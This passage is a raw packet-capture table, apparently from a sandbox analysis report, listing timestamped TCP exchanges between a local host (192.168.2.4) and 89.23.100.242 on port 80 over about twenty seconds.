                                                                                                Jan 10, 2025 07:57:55.577157974 CET4976480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.577485085 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.582464933 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.582505941 CET804976489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.582525969 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.582549095 CET4976480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.582652092 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.587444067 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.939254045 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:55.944434881 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.944472075 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:55.944504976 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.344883919 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.478418112 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.478482008 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.591308117 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.591507912 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.597021103 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.597037077 CET804976589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.597090960 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.597162008 CET4976580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.597197056 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.602164030 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.954626083 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:56.960830927 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.960851908 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:56.960864067 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.002363920 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.002748966 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.007304907 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.007386923 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.007466078 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.012345076 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.050102949 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.121304035 CET804976789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.121356010 CET4976780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.128453016 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.133375883 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.133443117 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.133534908 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.138328075 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.360899925 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.366110086 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.366156101 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.485857010 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.658756018 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.658806086 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.658837080 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.750890970 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.886811972 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.886897087 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:57.897707939 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:57.970182896 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.037674904 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.154133081 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.154301882 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.154648066 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.159471035 CET804976889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.159524918 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.159589052 CET4976880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.159622908 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.159653902 CET804976989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.159732103 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.159742117 CET4976980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.164601088 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.517132998 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:58.522433996 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.522471905 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.522499084 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.919815063 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:58.970181942 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.070936918 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.173302889 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.183836937 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.184160948 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.188822985 CET804977089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.188874960 CET4977080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.189074039 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.189146996 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.189234972 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.193986893 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.548393965 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:59.553428888 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.553469896 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.553499937 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:59.954938889 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.098126888 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.098284006 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.104898930 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.104962111 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.105047941 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.105056047 CET804977289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.105545998 CET4977280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.111696005 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.454629898 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.459619999 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.459651947 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.459678888 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.838918924 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:00.953502893 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:00.968684912 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.092089891 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.092413902 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.097362041 CET804977889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.097397089 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.097425938 CET4977880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.097487926 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.097579002 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.102359056 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.454739094 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:01.459753036 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.459836006 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.459863901 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:01.932148933 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.050705910 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.051042080 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.056035042 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.056076050 CET804978989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.056109905 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.056140900 CET4978980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.056330919 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.061306953 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.407752037 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.412677050 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.412817001 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.412844896 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.803215027 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.920264006 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.922558069 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.925447941 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.925519943 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.925606012 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.927664042 CET804979589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:02.927818060 CET4979580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:02.930504084 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.234491110 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:03.239579916 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.242065907 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:03.244288921 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:03.249133110 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.282778978 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:03.287697077 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.287976027 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.595292091 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:03.600311995 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.600344896 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.600372076 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.786283016 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:03.901524067 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.003618956 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.110837936 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.195121050 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.309701920 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.317564011 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.317773104 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.318124056 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.322618008 CET804979689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.322691917 CET4979680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.322927952 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.323000908 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.323093891 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.323101044 CET804980189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.323158026 CET4980180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.327903986 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.673408985 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:04.678520918 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.678544998 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:04.678553104 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:05.183228970 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:05.313972950 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:05.324965000 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:05.504681110 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:05.505093098 CET4981480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:05.509773016 CET804980889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:05.509984970 CET804981489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:05.510055065 CET4980880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:05.510072947 CET4981480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:05.510200977 CET4981480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:05.515023947 CET804981489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:05.860974073 CET4981480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:05.866076946 CET804981489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:05.866112947 CET804981489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:05.866142035 CET804981489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:06.311803102 CET804981489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:06.463865995 CET804981489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:06.465204954 CET4981480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:06.595204115 CET4981480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:06.595366955 CET4982380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:06.600199938 CET804982389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:06.600318909 CET804981489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:06.600398064 CET4981480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:06.600399971 CET4982380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:06.600534916 CET4982380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:06.605277061 CET804982389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:06.954659939 CET4982380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:06.959712029 CET804982389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:06.959727049 CET804982389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:06.959738016 CET804982389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:07.344628096 CET804982389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:07.468744993 CET4982380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:07.468977928 CET4983080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:07.473887920 CET804983089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:07.473918915 CET804982389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:07.473968983 CET4983080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:07.473983049 CET4982380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:07.474140882 CET4983080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:07.478998899 CET804983089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:07.829819918 CET4983080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:07.834872961 CET804983089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:07.834908962 CET804983089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:07.834937096 CET804983089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:08.327179909 CET804983089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:08.376661062 CET4983080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.460572958 CET804983089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:08.501569033 CET4983080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.580286980 CET4983080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.580576897 CET4983780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.585429907 CET804983089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:08.585500002 CET4983080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.585552931 CET804983789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:08.585624933 CET4983780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.585736990 CET4983780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.590580940 CET804983789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:08.800123930 CET4984080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.801567078 CET4983780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.805007935 CET804984089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:08.805102110 CET4984080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.805211067 CET4984080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.810050011 CET804984089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:08.849956036 CET804983789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:08.922875881 CET4984180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.928033113 CET804984189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:08.928163052 CET4984180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.928224087 CET4984180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:08.933059931 CET804984189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.089014053 CET804983789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.089088917 CET4983780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.157881975 CET4984080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.162780046 CET804984089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.163021088 CET804984089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.283199072 CET4984180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.288080931 CET804984189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.288177013 CET804984189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.288206100 CET804984189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.573379040 CET804984089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.664468050 CET804984189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.704595089 CET4984080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.706527948 CET804984089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.720182896 CET4984180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.813954115 CET4984080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.818079948 CET804984189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.860812902 CET4984180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.936229944 CET4984080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.936278105 CET4984180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.936530113 CET4984980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.941339016 CET804984089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.941396952 CET804984989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.941418886 CET4984080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.941459894 CET4984980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.941536903 CET804984189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:09.941582918 CET4984180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.941729069 CET4984980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:09.946609974 CET804984989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:10.298403025 CET4984980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:10.303345919 CET804984989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:10.303441048 CET804984989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:10.303467989 CET804984989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:10.681381941 CET804984989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:10.735925913 CET4984980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:10.808757067 CET804984989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:10.860945940 CET4984980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:10.956888914 CET4984980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:10.957185984 CET4985680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:10.961915970 CET804984989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:10.962147951 CET804985689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:10.962219954 CET4984980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:10.962253094 CET4985680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:10.962347984 CET4985680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:10.967132092 CET804985689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:11.314213991 CET4985680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:11.319174051 CET804985689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:11.319232941 CET804985689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:11.319261074 CET804985689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:11.725784063 CET804985689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:11.782841921 CET4985680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:11.860409021 CET804985689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:11.907721043 CET4985680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:12.007509947 CET4985680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:12.008455992 CET4986480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:12.015341997 CET804986489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:12.015397072 CET4986480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:12.015495062 CET4986480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:12.016343117 CET804985689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:12.016387939 CET4985680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:12.020275116 CET804986489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:12.360898018 CET4986480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:12.365773916 CET804986489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:12.365789890 CET804986489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:12.365803003 CET804986489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:12.755327940 CET804986489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:12.798330069 CET4986480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:12.905602932 CET804986489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:12.954567909 CET4986480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:13.029373884 CET4986480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:13.029675961 CET4987280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:13.034554958 CET804987289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:13.037344933 CET4987280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:13.037450075 CET4987280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:13.038598061 CET804986489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:13.041142941 CET4986480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:13.042274952 CET804987289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:13.392235994 CET4987280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:13.397222042 CET804987289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:13.397280931 CET804987289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:13.397310019 CET804987289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:13.794368982 CET804987289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:13.946679115 CET804987289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:13.949399948 CET4987280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.075392008 CET4987980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.075603962 CET4987280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.080282927 CET804987989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:14.080641985 CET804987289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:14.080723047 CET4987280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.080730915 CET4987980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.081201077 CET4987980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.086090088 CET804987989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:14.439058065 CET4987980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.443988085 CET804987989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:14.444125891 CET804987989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:14.444154978 CET804987989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:14.726224899 CET4988580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.726452112 CET4987980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.731208086 CET804988589.23.100.242192.168.2.4
